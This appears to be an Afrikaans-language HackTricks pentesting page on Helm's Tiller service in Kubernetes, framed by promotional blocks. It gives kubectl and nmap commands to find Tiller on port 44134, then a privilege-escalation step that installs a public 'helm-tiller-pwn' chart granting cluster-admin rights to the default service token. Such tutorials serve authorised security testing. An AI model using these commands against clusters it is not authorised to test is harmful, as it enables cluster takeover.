5.3 KiB
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling van eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
Basiese Inligting
Helm is die pakketbestuurder vir Kubernetes. Dit maak dit moontlik om YAML-lêers te verpak en hulle in openbare en private repositoriums te versprei. Hierdie pakkette word Helm Charts genoem. Tiller is die diens wat standaard op die poort 44134 loop en die diens aanbied.
Standaardpoort: 44134
PORT STATE SERVICE VERSION
44134/tcp open unknown
Enumerasie
As jy pods en/of dienste van verskillende namespaces kan enumereer, enumereer hulle en soek na diegene met "tiller" in hul naam:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
Voorbeelde:
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
Jy kan ook probeer om hierdie diens te vind deur die poort 44134 te kontroleer:
sudo nmap -sS -p 44134 <IP>
Sodra jy dit ontdek het, kan jy daarmee kommunikeer deur die klient helm-toepassing af te laai. Jy kan gereedskap soos homebrew
gebruik, of kyk na die amptelike vrystellingsbladsy. Vir meer besonderhede, of vir ander opsies, sien die installasiegids.
Dan kan jy die diens opnoem:
helm --host tiller-deploy.kube-system:44134 version
Voorregverhoging
Standaard is Helm2 geïnstalleer in die namespace kube-system met hoë voorregte, so as jy die diens vind en toegang daartoe het, kan dit jou in staat stel om voorregte te verhoog.
Al wat jy hoef te doen is om 'n pakkie soos hierdie een te installeer: https://github.com/Ruil1n/helm-tiller-pwn wat die standaard diens-token toegang gee tot alles in die hele groep.
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
In http://rui0.cn/archives/1573 het jy die verduideliking van die aanval, maar basies, as jy die lêers clusterrole.yaml en clusterrolebinding.yaml binne helm-tiller-pwn/pwnchart/templates/ lees, kan jy sien hoe alle voorregte aan die verstek-token gegee word.
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hack-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.